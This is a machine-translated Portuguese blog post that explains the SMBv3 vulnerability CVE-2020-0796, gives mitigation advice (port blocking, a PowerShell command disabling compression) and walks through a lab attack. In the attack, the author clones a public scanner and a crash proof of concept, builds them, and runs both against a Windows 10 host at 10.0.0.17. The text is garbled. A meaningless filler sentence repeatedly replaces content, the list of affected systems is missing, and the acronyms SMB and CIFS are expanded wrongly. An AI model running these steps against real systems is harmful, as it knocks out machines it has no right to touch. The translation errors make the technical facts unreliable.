Bem vindos ao Blog da comunidade ITsafe



Boa Leitura


Blog em em português sobre construção . Por favor se encontrar algo que necessite correção entre em contato. Os vídeos do blog ainda estão em hebraico, mas em breve estaremos traduzindo com a mesma qualidade que traduzimos os cursos.


Demonstração da vulnerabilidade de segurança CVE-2020-0796

SMB Protocolo ( Block Message Server ) Tem sido amplamente utilizado desde o Windows 2000, que implementou SMBv1, que também é vulnerável. O protocolo é um protocolo da camada de aplicação de um modelo TCP/IP, E usa a porta 445..

Este protocolo foi configurado pela primeira vez pela IBM, Intel e Microsoft como System File Internet Common ou em suma CIFS.

O protocolo é projetado para permitir o acesso remoto a arquivos em sistemas operacionais Windows e naturalmente pertence a tecnologia NBSS .

A partir da versão 8 Windows SMB aqui SMBv3 e há uma compatibilidade retrógrada para a "versão 2 ou 1" .

O protocolo já é autônomo e não usa a tecnologia NetBIOS diferente do uso básico do NBSS para configurar as comunicações TCP e usa a porta 445 diretamente.

Vulnerabilidade no protocolo SMBv3 –Vulnerabilidade no servidor e nas estações finais que expõem o compartilhamento de arquivos usando este protocolo pode ser explorada enviando um pacote específico para o servidor, sem identificação.

A vulnerabilidade do cliente pode ser explorada se o invasor fizer com que o usuário se conecte a um servidor sob seu controle.

Atualmente, os sistemas operacionais são vulneráveis a esta vulnerabilidade:
O parâmetro é refletido na resposta à mensagem A recomendação é ter certeza de que sua organização está atualizada e todos os computadores com os sistemas operacionais vulneráveis estão de fato totalmente atualizados e, além disso

É altamente recomendável certificar-se de que não haja tráfego de entrada ou saída da rede corporativa para outras redes (Portas 445,139, 138, 137 )

Se necessário, é possível permitir o tráfego SMB da rede corporativa para outra rede enquanto se tem uma VPN com criptografia e identificação adequadas, é importante notar que você deve restringir o acesso aos endereços necessários para isso apenas.

É recomendado e até obrigatório cancelar o uso de compressão neste protocolo nos servidores até que uma atualização de segurança adequada seja emitida para que você possa cancelar a compressão usando um comando PowerShell:

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force

Bem, então vamos para a parte que é mais interessante para você, a fim de realizar o ataque necessário :

  • Kali Linux 2020
  • Demonstração de segurança de vulnerabilidade do sistema operacional para Windows de demonstração e prática de exemplo_10_64x_1903

O parâmetro é refletido na resposta à mensagem
Vamos abrir em Kali o terminal e baixar o seguinte scanner de vulnerabilidade:

Git clone https://github.com/ButrintKomoni/cve-2020-0796.git

O parâmetro é refletido na resposta à mensagem Vamos verificar o endereço da máquina que executamos :
O parâmetro é refletido na resposta à mensagem Iremos para a pasta :
cd Desktop/cve-2020-0796
E escaneamos
python3 cve-2020-0796-scanner.py 10.0.0.17

O parâmetro é refletido na resposta à mensagem
O computador parece estar vulnerável 😊
No momento em que este livro foi escrito, ainda não havia uma implementação completa do Exploit, então usaremos o POC que faz com que o sistema trave e faremos o download dopoc :

git clone https://github.com/eerykitty/CVE-2020-0796-PoC.git
O parâmetro é refletido na resposta à mensagem
Em seguida, instalaremos o exploit :
python3 setup.py build

O parâmetro é refletido na resposta à mensagem Vamos executar o seguinte comando para instalação
sudo Python3 setup.py install

O parâmetro é refletido na resposta à mensagem
Executaremos o exploit quando o endereço IP 10.0.017 for nosso objetivo no exemplo
Python3 CVE-2020-0796.py 10.0.0.17

O parâmetro é refletido na resposta à mensagem E no computador atacado, obtemos :
O parâmetro é refletido na resposta à mensagem

Compartilhe este post